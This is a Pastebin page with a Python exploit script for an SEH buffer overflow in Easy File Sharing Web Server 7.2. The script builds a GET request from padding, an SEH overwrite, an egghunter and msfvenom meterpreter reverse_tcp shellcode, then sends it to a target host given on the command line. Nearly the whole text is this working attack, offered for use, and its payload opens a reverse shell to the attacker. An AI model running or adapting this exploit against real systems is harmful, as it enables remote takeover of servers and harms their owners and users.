Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
- # Date: 2016/8/31
- # Exploit Author: Iran Cyber Security Group
- # Vendor Homepage: http://www.sharing-file.com
- # Software Link: http://www.sharing-file.com/efssetup.exe
- # Version: 7.2 [LATEST]
- # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
- # CVE : N/A
- # Usage : python exploit.py [IP or Domain]
- # Discovered By Arash Khazaei (AKA XoDiAK)
- # Greetz To Iran Cyber Members & My Friends
- import sys,socket
- from struct import pack
- HOST = sys.argv[1]
- PORT = 80
- # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte
- # Replace It With Your Own Shellcode !
- shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
- "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1"
- "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d"
- "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61"
- "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79"
- "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32"
- "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9"
- "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f"
- "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85"
- "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7"
- "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab"
- "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3"
- "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31"
- "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba"
- "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11"
- "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90"
- "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e"
- "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09"
- "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a"
- "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59"
- "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb"
- "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b"
- "\x98\x35\x70\x3b\xe0")
- # Padding !
- junk = "A" * 4061
- # Next SEH
- nseh = "\xeb\x06\x90\x90"
- # 0x1000108b [ImageLoader.dll] POP POP RET
- seh = pack('<L', 0x10018848)
- # Egg Hunter 32 Byte Tag = w00tw00t
- egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
- "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
- exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000)
- try:
- s = socket.socket()
- s.connect((HOST, PORT))
- s.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
- s.close()
- except:
- print "Can't Connect To Web Server ! Is it up ?"
- print "Evil Buffer Sended Successfully!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement